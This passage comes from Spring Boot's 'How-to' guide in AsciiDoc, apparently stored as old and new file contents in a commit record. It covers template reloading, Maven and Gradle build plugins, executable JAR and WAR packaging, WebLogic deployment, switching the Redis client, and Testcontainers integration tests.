Thymeleaf, set `spring.thymeleaf.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/thymeleaf\/ThymeleafAutoConfiguration.java[`ThymeleafAutoConfiguration`] for other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/freemarker\/FreeMarkerAutoConfiguration.java[`FreeMarkerAutoConfiguration`] for other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`.\nSee {spring-boot-autoconfigure-module-code}\/groovy\/template\/GroovyTemplateAutoConfiguration.java[`GroovyTemplateAutoConfiguration`] for other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as https:\/\/www.jrebel.com\/products\/jrebel[JRebel] it is usually significantly faster than a \"`cold start`\".\nYou should probably give it a try before investigating some of the more complex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it should reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\nSpring Boot includes build plugins for Maven and Gradle.\nThis section answers common questions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing the coordinates, name, and version of the project.\nThe plugins can also be configured to add additional properties through configuration.\nWhen such a file is present, Spring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-docs}#goals-build-info[Spring Boot Maven Plugin documentation] for more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the {spring-boot-gradle-plugin-docs}#integrating-with-actuator-build-info[Spring Boot Gradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\nBoth Maven and Gradle allow generating a `git.properties` file containing information about the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to generate a `git.properties` file.\nTo use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the https:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"2.2.2\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format: `yyyy-MM-dd'T'HH:mm:ssZ`.\nThis is the default format for both plugins listed above.\nUsing this format lets the time be parsed into a `Date` and its format, when serialized to JSON, to be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nThe `spring-boot-dependencies` POM manages the versions of common dependencies.\nThe Spring Boot plugins for Maven and Gradle allow these managed dependency versions to be customized using build properties.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of third-party dependencies.\nOverriding versions may cause compatibility issues.\n\nTo override dependency versions with Maven, see {spring-boot-maven-plugin-docs}#using[this section] of the Maven plugin's documentation.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-docs}#managing-dependencies-customizing[this section] of the Gradle plugin's documentation.\n\n\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR.\nIf you use the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are repackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin.\nHowever, you must additionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-docs}#repackage[plugin documentation] for full usage details.\n\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency.\nIf your application contains classes that you want to share with other projects, the recommended approach is to move that code into a separate module.\nThe separate module can then be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle plugins must be configured to produce a separate artifact that is suitable for use as a dependency.\nThe executable archive cannot be used as a dependency as the <<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar format>> packages application classes in `BOOT-INF\/classes`.\nThis means that they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is executable, a classifier must be specified.\nThis classifier is applied to the name of the executable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems.\nFor example, JRuby includes its own nested jar support, which assumes that the `jruby-complete.jar` is always directly available as a file in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be automatically unpacked when the executable jar first runs.\nSuch nested jars are written beneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that it will not delete the jars that have been unpacked to the temporary directory while the application is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven Plugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products, the executable version has additional configuration files that are not needed in a library jar.\nFor example, the `application.yml` configuration file might be excluded from the non-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar for the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you can use the `jvmArguments` property of the {spring-boot-maven-plugin-docs}[maven plugin].\n\nSee {spring-boot-maven-plugin-docs}#run-example-debug[this example] for more details.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using spring-boot-antlib\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war archive.\nTo make it executable, you can either use the `spring-boot-antlib` module or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested `BOOT-INF\/classes` directory.\n If you are building a war, package the application's classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib` for a war.\n Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib` directory for a jar or `WEB-INF\/lib-provided` for a war.\n Remember *not* to compress the entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class` is available).\n. Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class` attribute in the manifest and specify the other properties it needs as manifest entries -- principally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and applications are deployed by default on an embedded Reactor Netty server, War deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a `SpringBootServletInitializer` subclass and override its `configure` method.\nDoing so makes use of Spring Framework's Servlet 3.0 support and lets you configure your application when it is launched by the servlet container.\nTypically, you should update your application's main class to extend `SpringBootServletInitializer`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war file rather than a jar file.\nIf you use Maven and `spring-boot-starter-parent` (which configures Maven's war plugin for you), all you need to do is to modify `pom.xml` to change the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the project, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not interfere with the servlet container to which the war file is deployed.\nTo do so, you need to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this case) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration.\nAmong other limitations, `compileOnly` dependencies are not on the test classpath, so any web-based integration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>, marking the embedded servlet container dependency as provided produces an executable war file with the provided dependencies packaged in a `lib-provided` directory.\nThis means that, in addition to being deployable to a servlet container, you can also run your application by using `java -jar` on the command line.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to a Spring Boot application.\nTo do so, throw away the code that creates your `ApplicationContext` and replace it with calls to `SpringApplication` or `SpringApplicationBuilder`.\nSpring MVC web applications are generally amenable to first creating a deployable war application and then migrating it later to an executable war or jar.\nSee the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting Started Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a class called `Application`) and adding the Spring Boot `@SpringBootApplication` annotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that, whatever you put in the `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here.\nThere might be some beans you can remove later and let Spring Boot provide its own defaults for them, but it should be possible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or `\/META-INF\/resources`) in the classpath root.\nThe same applies to `messages.properties` (which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further changes.\nIf you have other features in your application (for instance, using other servlets or filters), you may need to add some configuration to your `Application` context, by replacing those elements from the `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the container as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a `<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in your `Application`.\n Alternatively, simple cases where annotation configuration is heavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to your `Application`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you need to share the customizations of the builder in a method that is both available to the `SpringBootServletInitializer` callback and in the `main` method in a class similar to the following:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different techniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring Servlet 3.0+ initializer support classes.\nNormally, all the code from an existing `WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`.\nIf your existing application has more than one `ApplicationContext` (for example, if it uses `AbstractDispatcherServletInitializer`) then you might be able to combine all your context sources into a single `SpringApplication`.\nThe main complication you might encounter is if combining does not work and you need to maintain the context hierarchy.\nSee the <<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for examples.\nAn existing parent context that contains web-specific features usually needs to be broken up so that all the `ServletContextAware` components are in the child context.\n\nApplications that are not already Spring applications might be convertible to Spring Boot applications, and the previously mentioned guidance may help.\nHowever, you may yet encounter problems.\nIn that case, we suggest https:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow with a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet initializer *directly* implements `WebApplicationInitializer` (even if you extend from a base class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version rather than the version that was pre-installed with the server.\nYou can do so by adding a `WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses https:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce].\nYou need to exclude that dependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead.\nSpring Boot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-data-redis') {\n\t\t exclude group: 'io.lettuce', module: 'lettuce-core'\n\t\t}\n\t\timplementation 'redis.clients:jedis'\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-testcontainers]]\n=== Use Testcontainers for integration testing\nThe https:\/\/www.testcontainers.org\/[Testcontainers] library provides a way to manage services running inside Docker containers.\nIt integrates with JUnit, allowing you to write a test class that can start up a container before any of the tests run.\nTestcontainers is especially useful for writing integration tests that talk to a real backend service such as MySQL, MongoDB, Cassandra etc.\nTestcontainers can be used in a Spring Boot test as follows:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@SpringBootTest\n@Testcontainers\nclass ExampleIntegrationTests {\n\n @Container\n static Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n}\n----\n\nThis will start up a docker container running Neo4j (if Docker is running locally) before any of the tests are run.\nIn most cases, you will need to configure the application using details from the running container, such as container IP or port.\n\nThis can be done with a static `@DynamicPropertySource` method that allows adding adding dynamic property values to the Spring Environment.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@SpringBootTest\n@Testcontainers\nclass ExampleIntegrationTests {\n\n @Container\n static Neo4jContainer<?> neo4j = new Neo4jContainer<>();\n\n @DynamicPropertySource\n static void neo4jProperties(DynamicPropertyRegistry registry) {\n registry.add(\"spring.data.neo4j.uri\", neo4j::getBoltUrl);\n }\n\n}\n----\n\nThe above configuration allows Neo4j-related beans in the application to communicate with Neo4j running inside the Testcontainers-managed Docker container.\n","old_contents":"[[howto]]\n= \"`How-to`\" Guides\ninclude::attributes.adoc[]\n\nThis section provides answers to some common '`how do I do that...`' questions that often arise when using Spring Boot.\nIts coverage is not exhaustive, but it does cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out https:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has already provided an answer.\nThis is also a great place to ask new questions (please use the `spring-boot` tag).\n\nWe are also more than happy to extend this section.\nIf you want to add a '`how-to`', send us a {spring-boot-code}[pull request].\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{spring-boot-module-api}\/diagnostics\/FailureAnalyzer.html[`FailureAnalyzer`] is a great way to intercept an exception on startup and turn it into a human-readable message, wrapped in a {spring-boot-module-api}\/diagnostics\/FailureAnalysis.html[`FailureAnalysis`].\nSpring Boot provides such an analyzer for application-context-related exceptions, JSR-303 validations, and more.\nYou can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the presence of a specified exception type in the exception to handle.\nYou can extend from that so that your implementation gets a chance to handle the exception only when it is actually present.\nIf, for whatever reason, you cannot handle the exception, return `null` to give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer` can simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but sometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot `ApplicationContext`.\nYou can see it if you enable `DEBUG` logging output.\nIf you use the `spring-boot-actuator` (see <<production-ready-features.adoc#production-ready,the Actuator chapter>>), there is also a `conditions` endpoint that renders the report in JSON.\nUse that endpoint to debug the application and see what features have been added (and which have not been added) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc.\nWhen reading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources.\n Pay special attention to the `+@Conditional*+` annotations to find out what features they enable and when.\n Add `--debug` to the command line or a System property `-Ddebug` to get a log on the console of all the auto-configuration decisions that were made in your app.\n In a running application with actuator enabled, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX equivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`]) and read from there the available external configuration options.\n The `@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to external properties.\n Thus, `ServerProperties` has `prefix=\"server\"` and its configuration properties are `server.port`, `server.address`, and others.\n In a running application with actuator enabled, look at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values explicitly out of the `Environment` in a relaxed manner.\n It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in response to SpEL expressions, normally evaluated with placeholders resolved from the `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that are used to apply customizations to the context or environment.\nSpring Boot loads a number of such customizations for use internally from `META-INF\/spring.factories`.\nThere is more than one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers` methods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or `context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some even before the context is created) and then registers the listeners for events published by the `ApplicationContext` as well.\nSee \"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners,Application Events and Listeners>>`\" in the '`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is refreshed by using `EnvironmentPostProcessor`.\nEach implementation should be registered in `META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`.\nFor instance, the following example loads a YAML configuration file from the classpath:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources that Spring Boot loads by default.\nIt is therefore possible to get the location of the file from the environment.\nThe preceding example adds the `custom-resource` property source at the end of the list so that a key defined in any of the usual other locations takes precedence.\nA custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a convenient way to load a custom resource in the `Environment`, we do not recommend it.\nSuch property sources are not added to the `Environment` until the application context is being refreshed.\nThis is too late to configure certain properties such as `+logging.*+` and 